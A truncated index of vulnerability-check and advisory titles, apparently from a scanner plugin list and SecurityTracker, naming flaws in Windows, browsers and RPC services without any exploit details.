(Windows03) [802274] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows02) [802273] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows01) [802262] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802255] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802249] Wireshark Lua Script File Arbitrary Code Execution Vulnerability (Windows) [802248] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802237] Apple Safari Secure Cookie Security Bypass Vulnerability (Windows) [802227] IBM Lotus Symphony Multiple Vulnerabilities (Windows) [802219] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 04 [802218] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 03 [802217] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 02 [802216] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 01 [802215] Mozilla Firefox Security Bypass Vulnerability July-11 (Windows) [802214] Mozilla Products Multiple Denial of Service Vulnerabilities July-11 (Windows) [802213] Mozilla Products Multiple Vulnerabilities July-11 (Windows) [802212] Mozilla Firefox Multiple Vulnerabilities July-11 (Windows) [802211] Mozilla Products WebGL Information Disclosure Vulnerability July-11 (Windows) [802206] Adobe Products Unspecified Cross-Site Scripting Vulnerability June-2011 (Windows) [802203] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802202] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802201] Wireshark 'bytes_repr_len' Function Denial of Service Vulnerability (Windows) [802200] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802198] Apple QuickTime Multiple Denial of Service Vulnerabilities - (Windows) [802175] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows 01) [802174] Mozilla Products Enter Key Dialog Bypass and Use-After-Free Memory Corruption Vulnerabilities (Windows) [802173] Mozilla Products 'YARR' Code Execution Vulnerability (Windows) [802172] Mozilla Products Same Origin Policy Bypass Vulnerability (Windows) [802171] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities (Windows) [802170] Mozilla Firefox Memory Corruption and Integer Underflow Vulnerabilities (Windows) [802169] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows) [802166] Adobe Reader and Acrobat Multiple Vulnerabilities September-2011 (Windows) [802165] Adobe Reader Unspecified Vulnerability (Windows) [802163] Calendar Manager Service rpc.cmsd Service Detection [802153] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802152] Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows) [802151] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802150] Mozilla Products Multiple Vulnerabilities (Windows) [802149] Mozilla Firefox Untrusted Search Path Vulnerability (Windows) [802147] Mozilla Products 'SVG' Code Execution Vulnerability (Windows) [802141] Opera 'HTTPS-Session' Multiple Vulnerabilities (Windows) [802138] Mozilla Firefox Multiple Vulnerabilities August-11 (Windows) [802137] Nfs-utils rpc.rquotad Service Detection [802133] Apple QuickTime Multiple Buffer Overflow Vulnerabilities (Windows) [802126] Google Chrome 'GetWidget' methods DoS Vulnerability (Windows) [802119] VLC Media Player 'AMV' Denial of Service Vulnerability (Windows) [802113] Opera Browser 'SRC' Denial of Service Vulnerability (Windows) [802112] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802111] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802110] Adobe Reader and Acrobat Multiple BOF Vulnerabilities June-2011 (Windows) [802107] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802102] Google Chrome Multiple Vulnerabilities - June 11(Windows) [802100] Mozilla Firefox SSL Certificate Spoofing Vulnerability (Windows) [801951] Novell iPrint Client 'printer-url' Multiple BOF Vulnerabilities (Windows) [801937] IBM solidDB RPC Test Commands Denial of Service Vulnerabilities [801935] Microsoft Silverlight Multiple Memory Leak Vulnerabilities [801934] Microsoft Silverlight Version Detection [801921] Adobe Products Arbitrary Code Execution Vulnerability (Windows) [801905] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities March-11 (Windows) [801904] Mozilla Products Buffer Overflow Vulnerability March-11 (Windows) [801903] Mozilla Products Multiple Unspecified Vulnerabilities March-11 (Windows) [801902] Mozilla Products Multiple Vulnerabilities March-11 (Windows) [801898] TigerVNC SSL Certificate Validation Security Bypass Vulnerability (Windows) [801897] TigerVNC Version Detection (Windows) [801890] Google Chrome Multiple Denial of Service Vulnerabilities - May11 (Windows) [801887] Mozilla Products Unspecified Vulnerability May-11 (Windows) [801886] Mozilla Firefox Multiple Unspecified Vulnerabilities May-11 (Windows) [801885] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 02 [801884] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 01 [801883] Mozilla Products Multiple Vulnerabilities May-11 (Windows) [801878] Google Chrome multiple vulnerabilities - May11 (Windows) [801876] Microsoft Internet Explorer 'msxml.dll' Information Disclosure Vulnerability [801875] Mozilla Firefox Information Disclosure Vulnerability (Windows) [801872] Synergy Protocol Information Disclosure Vulnerability (Windows) [801871] Synergy Version Detection (Windows) [801855] Google Chrome multiple vulnerabilities - March 11 (Windows) [801847] Adobe Flash Player Multiple Vulnerabilities February-2011 (Windows) [801844] Adobe Reader and Acrobat Multiple Vulnerabilities February-2011 (Windows) [801831] Microsoft Internet Explorer Incorrect GUI Display Vulnerability [801830] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability [801825] Google Chrome multiple vulnerabilities - Jan11 (Windows) [801797] Python Multiple Vulnerabilities (Windows) [801795] Python Version Detection (Windows) [801792] Adobe Flash Player Multiple Vulnerabilities May-2011 (Windows) [801790] Perl Denial of Service Vulnerability (Windows) [801789] Google Chrome 'Sandbox' Remote Code Execution Vulnerability (Windows) [801788] Opera Browser 'SELECT' HTML Tag Remote Memory Corruption Vulnerability (Windows) [801786] Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows) [801785] Wireshark X.509if Dissector Denial of service vulnerability (Windows) [801784] VLC Media Player 'MP4_ReadBox_skcr()' Buffer Overflow Vulnerability (Windows) [801782] VLC Media Player 'Bookmark Creation' Buffer Overflow Vulnerability (Windows) [801779] RealNetworks RealPlayer 'OpenURLInDefaultBrowser()' Code Execution Vulnerability (Windows) [801776] Google Chrome 'GPU process' Multiple Code Execution Vulnerabilities (Windows) [801773] Google Chrome 'WebKit' CSS Implementation DoS Vulnerability (Windows) [801772] Rsync Multiple Denial of Service Vulnerabilities (Windows) [801771] Perl Laundering Security Bypass Vulnerability (Windows) [801770] Google Picasa Insecure Library Loading Arbitrary Code Execution Vulnerability (Windows) [801769] Google Picasa Version Detection (Windows) [801768] RealNetworks RealPlayer IVR File Processing Buffer Overflow Vulnerability (Windows) [801763] Google Chrome Multiple Vulnerabilities - March 11(Windows) [801761] Wireshark Denial of Service Vulnerability March-11 (Windows) [801758] Wireshark Denial of Service Vulnerability March-11 (Windows) [801757] Wireshark Multiple Vulnerabilities March-11 (Windows) [801756] Wireshark Denial of Service Vulnerability - March-11 (Windows) [801755] Wireshark Multiple Vulnerabilities - March-11 (Windows) [801749] RealNetworks RealPlayer Buffer Overflow Vulnerability (Windows) [801747] Google Chrome Multiple Denial of Service Vulnerabilities - February 11(Windows) [801742] Wireshark Denial of Service Vulnerability (Windows) [801739] Google Chrome multiple vulnerabilities - February 11(Windows) [801728] Opera Browser Multiple Vulnerabilities Feb-11 (Windows) [801726] VLC Media Player 'CDG decoder' multiple buffer overflow vulnerabilities (Windows) [801725] Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593) [801723] Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege (939778) [801721] Microsoft Active Directory Denial of Service Vulnerability (953235) [801715] Microsoft XML Core Services Remote Code Execution Vulnerability (936227) [801714] Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782) [801712] Vulnerability in RPC Could Allow Denial of Service (933729) [801709] Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078) [801708] Vulnerability in Windows Media File Format Could Allow Remote Code Execution [801707] Microsoft Internet Explorer mshtml.dll Remote Memory Corruption Vulnerability (942615) [801704] Microsoft Internet Information Services Privilege Elevation Vulnerability (942831) [801702] Microsoft Internet Explorer HTML Rendering Remote Memory Corruption Vulnerability (944533) [801680] Apple QuickTime Multiple vulnerabilities - Dec10 (Windows) [801678] Google Chrome multiple vulnerabilities - Dec10 (Windows) [801677] Microsoft WMI Administrative Tools ActiveX Control Remote Code Execution Vulnerabilities [801667] Google Chrome multiple vulnerabilities - Dec 10(Windows) [801637] Mozilla Firefox Security Bypass Vulnerability (Windows) [801629] Adobe Flash Player Multiple Vulnerabilities (Windows) [801606] Microsoft Internet Explorer 'mshtml.dll' Information Disclosure Vulnerability [801597] Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability [801596] Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability [801595] Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities [801594] Microsoft PowerPoint 2007 OfficeArt Atom Remote Code Execution Vulnerability [801581] MS Windows HID Functionality(Over USB) Code Execution Vulnerability [801561] VMware Products Tools Local Privilege Escalation Vulnerability (Windows) [801540] Google Chrome multiple vulnerabilities - November 10(Windows) [801530] Oracle Java SE Multiple Vulnerabilities (Windows) [801524] Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows) [801520] Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability [801506] RealNetworks RealPlayer Multiple Vulnerabilities (Windows) [801499] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801498] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801497] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801495] Opera Browser Multiple Vulnerabilities December-10 (Windows) [801491] Microsoft 'hxvz.dll' ActiveX Control Memory Corruption Vulnerability (948881) [801489] Microsoft Office Graphics Filters Remote Code Execution Vulnerabilities (968095) [801488] Microsoft Internet Explorer Data Stream Handling Remote Code Execution Vulnerability (947864) [801485] Microsoft Pragmatic General Multicast (PGM) Denial of Service Vulnerability (950762) [801481] Microsoft Wireless LAN AutoConfig Service Remote Code Execution Vulnerability (970710) [801480] Microsoft Web Services on Devices API Remote Code Execution Vulnerability (973565) [801477] Adobe Products Content Code Execution Vulnerability (Windows) [801475] Mozilla Firefox Unspecified Vulnerability Oct-10 (Windows) [801474] Opera Browser Multiple Vulnerabilities October-10 (Windows) [801473] Google Chrome multiple vulnerabilities - October 10(Windows) [801471] Mozilla Products Multiple Cross-site Scripting Vulnerabilities (Windows) [801470] Mozilla Products Multiple Unspecified Vulnerabilities October-10(Windows) [801469] Mozilla Products Unspecified Vulnerability (Windows) [801468] Mozilla Products Multiple Unspecified Vulnerabilities (Windows) [801467] Mozilla Products Multiple Vulnerabilities October-10 (Windows) [801465] Adobe Flash Player Untrusted search path vulnerability (windows) [801460] Google Chrome multiple unspecified vulnerabilities - October 10(Windows) [801452] Mozilla Products 'SJOW' Arbitrary Code Execution Vulnerability (Windows) [801451] Mozilla Products 'SJOW' Multiple Vulnerabilities (Windows) [801450] Mozilla Products Multiple Vulnerabilities sep-10 (Windows) [801447] Google Chrome multiple vulnerabilities (Windows) Sep10 [801429] VLC Media Player Meta-Information Denial of Service Vulnerability (Windows) [801423] Novell iPrint Client Multiple Security Vulnerabilities (Windows) [801399] MS Windows Insecure Library Loading Remote Code Execution Vulnerabilities (2269637) [801386] Mozilla Products Multiple Vulnerabilitie july-10 (Windows) [801385] Mozilla Products Multiple Vulnerabilities jul-10 (Windows) [801365] Adobe Acrobat and Reader Multiple Vulnerabilities -July10 (Windows) [801358] MS Windows Help and Support Center Remote Code Execution Vulnerability [801349] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability (June-10) [801348] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability -june 10 [801347] Mozilla Firefox 'IFRAME' Denial Of Service vulnerability (Windows) [801345] Microsoft .NET 'ASP.NET' Cross-Site Scripting vulnerability [801344] Microsoft .NET '__VIEWSTATE' Cross-Site Scripting vulnerability [801342] Microsoft ASP.NET Cross-Site Scripting vulnerability [801331] Opera Browser 'document.write()' Code execution Vulnerability (Windows) [801330] Microsoft Internet Explorer Cross Site Data Leakage Vulnerability [801329] Google Chrome Cross Site Data Leakage Vulnerability (Windows) [801319] VMware Products Multiple Vulnerabilities (Windows) [801302] Skype Extras Manager Unspecified Vulnerability (Windows) [801301] Skype Version Detection (Windows) [801257] Opera Browser Multiple Vulnerabilities August-10 (Windows) [801216] Opera 'IFRAME' Denial Of Service vulnerability (Windows) [801109] Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09 [801034] Wireshark 'DCERPC/NT' Dissector DOS Vulnerability - Nov09 (Win) [801000] Visualization Library Multiple Unspecified Vulnerabilities (Windows) [800999] Visualization Library Version Detection (Windows) [800968] Microsoft SharePoint Team Services Information Disclosure Vulnerability [800967] Perl UTF-8 Regular Expression Processing DoS Vulnerability (Windows) [800966] Perl Version Detection (Windows) [800910] Microsoft Internet Explorer Buffer Overflow Vulnerability - Jul09 [800902] Microsoft Internet Explorer XSS Vulnerability - July09 [800872] Microsoft Internet Explorer 'li' Element DoS Vulnerability - Sep09 [800863] Microsoft Internet Explorer XML Document DoS Vulnerability - Aug09 [800861] Microsoft Internet Explorer 'findText()' Unicode Parsing DoS Vulnerability [800845] Microsoft Office Web Components ActiveX Control Code Execution Vulnerability [800829] Microsoft Video ActiveX Control 'msvidctl.dll' BOF Vulnerability [800770] Google Chrome Multiple Vulnerabilities Windows - May10 [800761] HP System Management Homepage Unspecified Vulnerability (Windows) [800755] Mozilla Products Firebug Code Execution Vulnerability (Windows) [800753] Mozilla Products Multiple Vulnerabilitie Apr-10 (Windows) [800752] Mozilla Products Multiple Code Execution vulnerabilities (Windows [800751] Mozilla Products 'nsTreeSelection' Denial of Service vulnerability (Windows) [800750] Mozilla Products Denial of Service Vulnerability (Windows) [800742] Microsoft Internet Explorer Unspecified vulnerability [800700] Microsoft GDIPlus PNG Infinite Loop Vulnerability [800669] Microsoft Internet Explorer Denial Of Service Vulnerability - July09 [800505] Microsoft HTML Help Workshop buffer overflow vulnerability [800499] Oracle Java SE Multiple Vulnerabilities (Windows) [800481] Microsoft SharePoint Cross Site Scripting Vulnerability [800461] Microsoft Internet Explorer Information Disclosure Vulnerability (980088) [800435] Google SketchUp Multiple Vulnerabilities (Windows) [800429] Microsoft Internet Explorer Remote Code Execution Vulnerability (979352) [800382] Microsoft PowerPoint File Parsing Remote Code Execution Vulnerability (967340) [800347] Microsoft Internet Explorer Clickjacking Vulnerability [800343] Microsoft Word 2007 Sensitive Information Disclosure Vulnerability [800337] Microsoft Internet Explorer NULL Pointer DoS Vulnerability [800267] Microsoft GDIPlus Library File Integer Overflow Vulnerability [800247] Wireshark Multiple Vulnerabilities Feb-09 (Windows) [800218] Microsoft Money 'prtstb06.dll' Denial of Service vulnerability [800217] Microsoft Money Version Detection [800215] PGP Desktop Version Detection (Windows) [800209] Microsoft Internet Explorer Version Detection (Win) [800208] Microsoft Internet Explorer Anti-XSS Filter Vulnerabilities [800192] HP SMH Insight Diagnostics Cross Site Scripting Vulnerability - Windows [800120] Google Chrome Version Detection (Windows) [800106] Adobe Reader/Acrobat JavaScript Method Handling Vulnerability (Windows) [800083] Microsoft Outlook Express Malformed MIME Message DoS Vulnerability [800082] Microsoft SQL Server sp_replwritetovarbin() BOF Vulnerability [800040] Wireshark Multiple Vulnerabilities - Oct08 (Windows) [800016] Mozilla SeaMonkey Version Detection (Windows) [800000] VMWare products version detection (Windows) [103254] Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability [101100] Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution (973908) [101018] Windows SharePoint Services detection [101017] Microsoft MS03-018 security check [101016] Microsoft MS03-022 security check [101015] Microsoft MS03-034 security check [101014] Microsoft MS00-078 security check [101012] Microsoft MS03-051 security check [101010] Microsoft Security Bulletin MS05-004 [101009] Microsoft Security Bulletin MS06-033 [101007] Microsoft dotNET version grabber [101006] Microsoft Security Bulletin MS06-056 [101005] Microsoft Security Bulletin MS07-040 [101004] Microsoft MS04-017 security check [101003] Microsoft MS00-058 security check [101000] Microsoft MS00-060 security check [100952] Microsoft IIS FTPd NLST stack overflow [100950] Microsoft DNS server internal hostname disclosure detection [100798] MailEnable 'MESMTRPC.exe' SMTP Service Multiple Remote Denial of Service Vulnerabilities [100608] Windows NT NNTP Component Buffer Overflow [100607] Microsoft SMTP Service and Exchange Routing Engine Buffer Overflow Vulnerability [100529] PHP xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities [100357] Cisco VPN Client for Windows 'StartServiceCtrlDispatche' Local Denial of Service Vulnerability [100062] Microsoft Remote Desktop Protocol Detection [96204] Get Windows Eventlog Entries over WMI [90020] Windows vulnerability in DNS Client Could Allow Spoofing (945553) [80036] rpc.ypupdated remote execution [80034] irix rpc.passwd overflow [80029] rpc.nisd overflow [80007] Microsoft MS00-06 security check [65954] SLES10: Security update for librpcsecgss [64922] Debian Security Advisory DSA 1890-1 (wxwindows2.4 wxwidgets2.6 wxwidgets2.8) [58670] Debian Security Advisory DSA 1387-1 (librpcsecgss) [58588] Debian Security Advisory DSA 1368-1 (librpcsecgss) [55127] Gentoo Security Advisory GLSA 200508-13 (pear-xml_rpc phpxmlrpc) [55050] FreeBSD Ports: pear-XML_RPC [54977] Gentoo Security Advisory GLSA 200507-01 (pear-xml_rpc phpxmlrpc) [54206] FreeBSD Ports: pear-XML_RPC [53990] FreeBSD Ports: pear-XML_RPC [53957] Slackware Advisory SSA:2005-111-02 Python SimpleXMLRPCServer module [53601] Debian Security Advisory DSA 312-1 (kernel-patch-2.4.18-powerpc) [53163] Debian Security Advisory DSA 466-1 (kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus) [53114] Debian Security Advisory DSA 417-1 (kernel-patch-2.4.18-powerpc, kernel-image-2.4.18-1-alpha) [20377] Windows Server Update Services detection [15467] Vulnerability in RPC Runtime Library Could Allow Information Disclosure and Denial of Service (873350) [14229] HTTP Directory Traversal (Windows) [13752] Denial of Service (DoS) in Microsoft SMS Client [11992] Vulnerability in Microsoft ISA Server 2000 H.323 Filter(816458) [11887] Buffer Overflow in Windows Troubleshooter ActiveX Control (826232) [11443] Microsoft IIS UNC Mapped Virtual Host Vulnerability [11433] Microsoft ISA Server DNS - Denial Of Service (MS03-009) [11429] Windows Messenger is installed [11418] Sun rpc.cmsd overflow [11340] SSH Secure-RPC Weak Encrypted Authentication [11217] Microsoft's SQL Version Query [11177] Flaw in Microsoft VM Could Allow Code Execution (810030) [11160] Windows Administrator NULL FTP password [11159] MS RPC Services null pointer reference DoS [11147] Unchecked Buffer in Windows Help(Q323255) [11146] Microsoft RDP flaws could allow sniffing and DOS(Q324380) [11111] rpcinfo -p [11091] Windows Network Manager Privilege Elevation (Q326886) [11067] Microsoft's SQL Hello Overflow [10964] Windows Debugger flaw can Lead to Elevated Privileges (Q320206) [10930] HTTP Windows 98 MS/DOS device names DOS [10929] FTP Windows 98 MS/DOS device names DOS [10862] Microsoft's SQL Server Brute Force [10763] Detect the HTTP RPC endpoint mapper [10755] Microsoft Exchange Public Folders Information Leak [10680] Test Microsoft IIS Source Fragment Disclosure [10674] Microsoft's SQL UDP Info Query [10673] Microsoft's SQL Blank Password [10491] ASP/ASA source using Microsoft Translate f: bug [10144] Microsoft SQL TCP/IP listener is running [2497] IBM Lotus Domino Notes RPC Authentication Processing Denial of Service Vulnerability SecurityTracker - https://www.securitytracker.com: [1025937] Microsoft Windows DHCPv6 Processing Flaw Lets Remote Denial of Service to RPC Services [1024441] Microsoft Windows RPC Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1015233] Microsoft Windows RPC Service May Let Remote Users Deny Service [1014417] Microsoft Windows Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users [1009762] Microsoft Windows COM Internet Services and RPC over HTTP Can Be Crashed By Remote Users [1007922] Microsoft Windows RPC Multi-threaded Race Condition Lets Remote Users Crash the Service or Execute Arbitrary Code [1007670] Microsoft Windows Remote Procedure Call (RPC) DCOM Activation Buffer Overflows Let Remote Users Execute Arbitrary Code [1007212] Microsoft Windows Remote Procedure Call (RPC) Service Buffer Overflow in Processing DCOM Requests Allows Remote Code Execution [1005455] Microsoft Windows Remote Procedure Call (RPC) Service Null Pointer Dereference Allows Remote Users to Crash the Service [1002394] Microsoft Windows NT Remote Procedure Call (RPC) Services Can Be Crashed With Malformed Packets [1002106] Microsoft Windows 2000 and Windows NT 4.0 RPC Input Validation Failure Lets Remote Users Destabilize the Operating System [1028906] Windows RPC Bug Lets Local Users Gain Elevated Privileges [1028903] Microsoft Windows Unicode Scripts Processor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1028754] Microsoft Windows Defender Pathname Bug Lets Local Users Gain Elevated Privileges [1028748] Microsoft Windows GDI+ TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1027934] Microsoft Windows Includes Some Invalid TURKTRUST Certificates [1027389] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027385] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027384] Microsoft Host Integration Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027383] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027381] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027380] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027114] Microsoft Windows Includes Some Invalid Certificates [1027043] Microsoft Windows Partition Manager Memory Allocation Error Lets Local Users Gain Elevated Privileges [1026905] Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026904] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026903] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026902] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026900] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026899] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026685] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026497] Microsoft Windows ClickOnce Feature Lets Remote Users Execute Arbitrary Code [1026271] Microsoft Windows TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1026167] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026103] Microsoft Windows SSL/TLS Protocol Flaw Lets Remote Users Decryption Sessions [1026041] Microsoft Windows Components DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026037] Microsoft Windows Internet Name Service (WINS) Input Validation Flaw in ECommEndDlg() Lets Local Users Gain Elevated Privileges [1025760] Microsoft Windows Bluetooth Stack Memory Access Error Lets Remote Users Execute Arbitrary Code [1025643] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1025634] Microsoft Windows OLE Automation Underflow Lets Remote Users Execute Arbitrary Code [1025512] Microsoft Windows Internet Name Service Socket Send Exception Handling Bug Lets Remote Users Execute Arbitrary Code [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025312] Microsoft Windows Kernel Bug in AFD.sys Lets Local Users Deny Service [1025248] Microsoft Windows Includes Some Invalid Comodo Certificates [1024888] Microsoft Exchange Server RPC Processing Flaw Lets Remote Authenticated Users Deny Service [1024879] Microsoft Windows Internet Connection Signup Wizard May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024877] Microsoft Windows May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024874] Microsoft Windows Task Scheduler Lets Local Users Gain Elevated Privileges [1024312] Microsoft Windows Tracing Feature for Services Lets Local Users Gain Elevated Privileges [1024216] Microsoft Windows Shell LNK Shortcut Processing Flaw Lets Users Execute Arbitrary Code [1023571] Microsoft Windows Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023566] Microsoft Windows Kerberos Ticket-Granting-Ticket Processing Flaw Lets Remote Authenticated Users Deny Service [1023495] Microsoft Internet Explorer and Windows OS Shell Handler URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1022710] Microsoft Windows Internet Name Service (WINS) Buffer Overflows Let Remote Users Execute Arbitrary Code [1022357] Windows RPC Marshalling Engine Memory Error Lets Local Users Gain Elevated Privileges [1022330] Microsoft Windows Bug in SETDESKWALLPAPER and GETDESKWALLPAPER Calls Let Local Users Deny Service [1022047] Microsoft Windows SearchPath Function May Let Remote Users Execute Arbitrary Code [1022044] Microsoft Windows Privilege Separation and Access Control Bugs Let Local Users Gain Elevated Privileges [1021629] Microsoft Windows Guidelines for Disabling AutoRun are Ineffective and May Permit Code Execution [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1021091] Windows Server Service RPC Processing Bug Lets Remote Users Execute Arbitrary Code [1021043] Microsoft Host Integration Server RPC Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020678] Microsoft Windows IPSec Policy May Not Be Enforced in Certain Cases [1020677] Microsoft Windows Event System Bugs Let Remote Authenticated Users Execute Arbitrary Code [1020446] Microsoft Windows AutoRun Bug May Let Users Execute Arbitrary Code [1020006] Microsoft Windows XP 'i2omgmt.sys' Input Validation Flaw Lets Local Users Gain Elevated Privileges [1019165] Microsoft Windows LSASS Lets Local Users Gain Elevated Privileges [1018942] Microsoft Windows DNS Service Insufficent Entropy Lets Remote Users Spoof the DNS Service [1018831] Microsoft Windows ShellExecute() URI Handler Bug Lets Remote Users Execute Arbitrary Commands [1018787] Windows RPC NTLMSSP Authentication Flaw Lets Remote Users Deny Service [1018366] Symantec Backup Exec for Windows RPC Bug Lets Remote Users Deny Service [1017901] Microsoft Windows Help File Heap Overflow Lets Remote Users Execute Arbitrary Code [1017827] Microsoft Windows Animated Cursor Bug Lets Remote Users Execute Arbitrary Code [1017736] Microsoft Windows Explorer OLE Parsing Bug Lets Users Deny Service [1017641] Microsoft Windows RichEdit OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017636] Microsoft Windows Defender Integer Overflow in Parsing PDF Files Lets Remote Users Execute Arbitrary Code [1017441] Microsoft Windows Workstation Service Memory Allocation Error in NetrWkstaUserEnum() Lets Remote Users Deny Service [1017369] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Book Files Let Remote Users Execute Arbitrary Code [1017168] Microsoft Windows Kernel GDI Data Structure Processing Bug Lets Local Users Gain Elevated Privileges [1016941] Microsoft Windows Shell Integer Overflow Lets Remote Users Execute Arbitrary Code [1016388] Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications [1016339] Microsoft Windows 'hlink.dll' Buffer Overflow in Processing Hyperlinks Lets Remote Users Execute Arbitrary Code [1016292] Microsoft Windows Buffer Overflow in AOL ART Image Rendering Library Lets Remote Users Execute Arbitrary Code [1016290] Microsoft Windows Buffer Overflow in TCP/IP Stack Lets Remote Users Execute Arbitrary Code [1016289] Microsoft RPC Mutual Authentication Bug Lets Remote Users Spoof Other Systems [1016286] Microsoft Windows 98 Graphics Rendering Engine Buffer Overflow in Processing WMF Images Lets Remote Users Execute Arbitrary Code [1016285] Windows Routing and Remote Access Service RPC Buffer Overflows Let Remote Users Execute Arbitrary Code [1015898] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Books Lets Remote Users Execute Arbitrary Code [1015897] Microsoft Windows Explorer COM Object Bug Lets Remote Users Execute Arbitrary Code [1015765] Microsoft Windows Services Have Unsafe Default ACLs That Let Remote Authenticated Users Gain Elevated Privileges [1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1015629] Microsoft Windows IGMP Processing Bug Lets Remote Users Deny Service [1015595] Microsoft Windows UPnP/NetBT/SCardSvr/SSDP Services May Be Incorrectly Configured By 3rd Party Applications, Allowing Local Users to Gain Elevated Privileges [1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015453] Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code [1015416] Microsoft Windows Unspecified WMF Rendering Bug Lets Remote Users Execute Arbitrary Code [1015349] Microsoft Windows Internet Explorer May Let Remote Users Obfuscate the Download Dialog Box [1015347] Microsoft Windows 2000 Kernel APC Queue Bug Lets Local Users Gain Elevated Privileges [1015168] Microsoft Windows Buffer Overflows in Graphics Rendering Engine Lets Remote Users Execute Arbitrary Code [1015049] Microsoft Internet Explorer Drag-and-Drop Timing May Let Remote Users Install Arbitrary Files [1015044] Microsoft Windows Multiple COM Objects Let Remote Users Execute Arbitrary Code [1015042] Microsoft Windows Plug and Play Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Lets Remote Users Execute Arbitrary Code [1015039] Microsoft Windows Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015037] Microsoft Windows Buffer Overflows in MSDTC and COM+ Let Remote 